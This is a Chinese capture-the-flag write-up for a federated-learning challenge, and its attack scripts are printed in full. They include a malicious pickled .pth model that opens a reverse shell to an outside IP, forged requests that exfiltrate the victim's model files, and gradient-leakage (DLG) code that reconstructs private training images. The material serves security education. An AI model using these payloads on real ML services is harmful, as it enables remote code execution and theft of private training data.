Federate

题目设计

本题通过在docker中隔离两个账户权限,模拟联邦学习框架。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
FROM python:3.10-slim

RUN apt-get update && apt-get install -y supervisor wget && rm -rf /var/lib/apt/lists/*

RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ \
flask \
requests \
pillow \
numpy

RUN pip install -i https://pypi.mirrors.ustc.edu.cn/simple/ torch==2.3.0+cpu torchvision==0.18.0+cpu -f https://download.pytorch.org/whl/torch_stable.html

RUN useradd -m -s /bin/bash victimuser
RUN useradd -m -s /bin/bash serveruser

COPY ./victim /app/victim
COPY ./server /app/server

RUN chown -R victimuser:victimuser /app/victim
RUN chmod 750 /app/victim

RUN chown -R serveruser:serveruser /app/server
RUN chmod 755 /app/server

COPY supervisord.conf /etc/supervisor/conf.d/supervisord.conf

CMD ["/usr/bin/supervisord", "-c", "/etc/supervisor/conf.d/supervisord.conf"]

通过中心服务节点的供应链打击,通过梯度泄露的方式,最终窃取其他用户隐私数据,摧毁整个联邦框架。

WriteUp

审计代码,题目的整体流程是:

1. 三方参与的联邦学习模型,玩家、Victim、Server
2. 每一轮中,玩家先获取一个模型和脚本到本地,训练之后上传模型;server接着传输给victim,victim训练结束后返回一个模型。

为了获得victim的flag数据,我们首先要控制Server端。审计代码注意到torch.load有weight_only = false,于是制作带有恶意代码的pth进行利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import runpy
import torch
from model import LeNet
import requests

class Demo(object):
def __reduce__(self):
return runpy._run_code, ("""import os,pty,socket;s=socket.socket();s.connect(("39.105.218.132",8080));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")""", {})

model = LeNet(num_classes=100)
model_dict = model.state_dict()
model_dict['evil'] = Demo()
torch.save(model_dict, 'evil.pth')


res = requests.get('http://localhost:8080/get_model')
with open('model.pth', 'wb') as f:
f.write(res.content)

res = requests.post('http://localhost:8080/upload_model', files={'model': open('evil.pth', 'rb')}, data={'model_name': 'client'})
print(res.json())

res = requests.get('http://localhost:8080/federated_round')
print(res.json())

注意到victim的训练过程关键如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
download_model()

load_model()

optimizer = optim.SGD(model.parameters(), lr=0.1)

......

img = Image.open(f'/app/victim/flag/{round}.png').convert('RGB')
img_tensor = transform(img).unsqueeze(0)

......

send_model()

因此在掌握了服务端模型的情况下,可以根据如下公式推出梯度

$$
Weight_{init} - Weight_{Trained} = \frac{\mathrm{d} y}{\mathrm{d} x} \times SGD_{Lr}
$$

此时的模型初始化十分重要,因为当梯度分布不均匀时,逆向LBFGS优化的代价越大,可能出现梯度爆炸。

接着,通过伪造服务端消息向victim发送数据,保存临时模型文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import torch
import torch.nn as nn
import requests
import os

class LeNet(nn.Module):
def __init__(self, num_classes=10):
super(LeNet, self).__init__()
self.body = nn.Sequential(
nn.Conv2d(3, 12, kernel_size=5, padding=5//2, stride=2),
nn.Sigmoid(),
nn.Conv2d(12, 12, kernel_size=5, padding=5//2, stride=2),
nn.Sigmoid(),
nn.Conv2d(12, 12, kernel_size=5, padding=5//2, stride=1),
nn.Sigmoid(),
)
self.fc = nn.Sequential(
nn.Linear(768, num_classes)
)

def forward(self, x):
out = self.body(x)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out

def weights_init(m):
if hasattr(m, "weight"):
m.weight.data.uniform_(-0.5, 0.5)
if hasattr(m, "bias"):
m.bias.data.uniform_(-0.5, 0.5)

torch.manual_seed(12345)
model = LeNet(num_classes=100)
model.apply(weights_init)
torch.save(model.state_dict(), '/app/server/global_model.pth')


for i in range(39):
res = requests.get(f'http://localhost:5000/action?round={i}')
print(res.status_code)
os.mkdir('/app/server/data')
os.system(f'cp /tmp/victim.pth /app/server/data/victim_{i}.pth')

因为只有单端口开发,思考文件如何外发,通过覆盖全局模型,走get_model路由外发

1
2
3
tar czvf data.tar data
rm global_model.pth
mv data.tar global_model.pth

获取模型数据后,通过DLG梯度泄露来还原flag数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import torch
from PIL import Image
import time
import os
import numpy as np
import torchvision.transforms as transforms
import torch.nn as nn
import torch.nn.functional as F
import pickle
import matplotlib.pyplot as plt
from model import LeNet, cross_entropy_for_onehot, label_to_onehot

def weights_init(m):
if hasattr(m, "weight"):
m.weight.data.uniform_(-0.5, 0.5)
if hasattr(m, "bias"):
m.bias.data.uniform_(-0.5, 0.5)

tt = transforms.ToTensor()
tp = transforms.ToPILImage()

for i in range(39):
torch.manual_seed(12345)
model = LeNet(num_classes=100)
model.apply(weights_init)

victim_model = LeNet(num_classes=100)
victim_model.load_state_dict(torch.load(f'data/victim_{i}.pth', weights_only=True, map_location='cpu'))

old_weights = [p.clone().detach() for p in model.parameters()]
new_weights = [p.clone().detach() for p in victim_model.parameters()]

original_dy_dx = []
for old_p, new_p in zip(old_weights, new_weights):
recon_g = (old_p - new_p) / 0.1
original_dy_dx.append(recon_g)


dummy_data = torch.randn(1,3,32,32).requires_grad_(True)
dummy_label = torch.randn(1,100).requires_grad_(True)

criterion = cross_entropy_for_onehot
optimizer = torch.optim.LBFGS([dummy_data, dummy_label])
history = []
for iters in range(151):
def closure():
optimizer.zero_grad()
dummy_pred = model(dummy_data)
dummy_onehot_label = F.softmax(dummy_label, dim=-1)
dummy_loss = criterion(dummy_pred, dummy_onehot_label)
dummy_dy_dx = torch.autograd.grad(dummy_loss, model.parameters(), create_graph=True)
grad_diff = 0
for gx, gy in zip(dummy_dy_dx, original_dy_dx):
grad_diff += ((gx - gy) ** 2).sum()
grad_diff.backward()
return grad_diff
optimizer.step(closure)
if iters % 10 == 0:
current_loss = closure()
print(iters, "%.4f" % current_loss.item())
history.append(tp(dummy_data[0]))
history[-1].save(f'results//{i}.png')

最终结果如下图

Something Interest

  1. 出题结束时候恰逢BlackHat会议,存在其他供应链问题。
  2. 模型参数的初始化问题难以调整,想要一次交互获得能够进行优化的梯度的种子太少了,我尝试了42、12345,2345,1234,114514,4444,1111,2222等数二十种,最终选取了这个种子。
  3. 致歉:短横线 - 和下划线 _ 没有说明白,错了QaQ。